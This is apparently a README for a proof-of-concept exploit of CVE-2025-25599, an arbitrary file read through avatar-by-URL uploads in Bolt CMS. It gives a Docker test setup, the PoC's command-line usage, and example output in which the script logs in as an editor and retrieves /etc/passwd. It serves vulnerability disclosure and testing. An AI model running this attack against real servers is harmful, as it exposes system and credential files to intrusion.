# CVE-2025-25599

## Details

[Bolt](https://boltcms.io) is an open-source content management system built
using the [Symfony PHP framework](https://symfony.com/). During a short
security assessment, [Certitude](https://certitude.consulting) identified several vulnerabilities including an **arbitrary file read**.

Users with the role **EDITOR**, **CHIEF_EDITOR**, **ADMIN**, or **DEVELOPER** may abuse an [insecure temporary file disclosure](https://cwe.mitre.org/data/definitions/377.html) when **uploading an avatar via URL** in order to **read arbitrary files** from the underlying server.

For further details, please refer to this [blog post](https://certitude.consulting).

## Proof of Concept

### Docker

A Docker container is included for testing. It installs and runs Bolt CMS 2.3.20 from composer on a debian base. Once running, Bolt is accessible at [http://localhost:8001](http://localhost:8001).
```
sudo docker compose up --build
```

#### Usage
```
python3 poc.py -h
usage: poc.py [-h] -u USERNAME -p PASSWORD -U URL [-f FILE] [-v] [-o OUT]

Proof of concept script for CVE-2025-25599

options:
  -h, --help            show this help message and exit
  -u USERNAME, --username USERNAME
                        Username of a user who has the EDITOR role or higher
  -p PASSWORD, --password PASSWORD
  -U URL, --url URL     URL for website running Bolt CMS (e.g. http://127.0.0.1)
  -f FILE, --file FILE  (Optional) Full path of the file to download (Default: /etc/passwd)
  -v, --verbose         (Optional) Increase verbosity
  -o OUT, --out OUT     (Optional) Path to store downloaded file
```

#### Example output
```
python3 poc.py -u editor -p password -U http://localhost:8001/ -f /etc/passwd -v
[+] Found Bolt login page
[*] _token = 3fa91864a4dce766...SNIP...ERwLEK7jMnXOarGA
[+] Logged in as "editor"
[*] _csrf_token = 42fd9dc3d163fdff...SNIP...ti7VhvNHsH0xSi-A
[*] Starting upload and download threads...
[+] Downloaded "/etc/passwd"

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
messagebus:x:100:101::/nonexistent:/usr/sbin/nologin
systemd-network:x:998:998:systemd Network Management:/:/usr/sbin/nologin
systemd-timesync:x:997:997:systemd Time Synchronization:/:/usr/sbin/nologin
```